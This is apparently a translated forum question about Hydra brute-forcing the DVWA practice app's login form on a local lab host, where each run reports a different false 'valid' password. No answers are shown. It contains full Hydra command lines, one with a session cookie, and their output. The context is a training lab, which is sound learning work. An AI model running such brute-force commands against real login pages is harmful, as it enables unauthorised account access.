Problema di Linux Hydra - successo casuale della password corretta

1

Ho un problema con Hydra quando lo uso. Ho provato le stesse linee di comando fornite nelle guide direttamente supportate dall'applicazione dannatamente vulnerabile Web (DVWA) v1.8.

Ok così .. ecco il mio tentativo di uscita ...

root@kali:~# hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt
http-get-form "/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&
password=^PASS^&submit=Login:Username and/or password incorrect." -f

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-09-06 05:18:12
[DATA] 16 tasks, 1 server, 500 login tries (l:1/p:500), ~31 tries per task
[DATA] attacking service http-get-form on port 80
[80][www-form] host: 192.168.1.2   login: admin   password: shadow
[STATUS] attack finished for 192.168.1.2 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-09-06 05:18:12

Sì, è vero che il metodo del modulo HTML è GET. : O)

Ok, indipendentemente da quante volte eseguo il comando ottengo risposte diverse .. come ..

Tentativo 1

[80][www-form] host: 192.168.1.2   login: admin   password: 101193
[80][www-form] host: 192.168.1.2   login: admin   password: horse

Tentativo 2

[80][www-form] host: 192.168.1.2   login: admin   password: carhorn
[80][www-form] host: 192.168.1.2   login: admin   password: shadowfox
[80][www-form] host: 192.168.1.2   login: admin   password: multible

UPDATE !!!!

hydra 192.168.1.2 -l admin -P /wordlists/500-worst-passwords.txt http-get-form 
"/DVWA-1.0.8/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&
submit=Login:Username and/or password incorrect.:H=Cookie: security=high;
PHPSESSID=jtujthkeh08foqfomph232rp77"

Ho provato ad aggiungere anche l'ID phpsession dei cookie. Ho anche provato a inserire:

-t <tasks>

Finora non ho avuto successo.

    
posta Daniel 06.09.2013 - 11:30
fonte

0 risposte

Leggi altre domande sui tag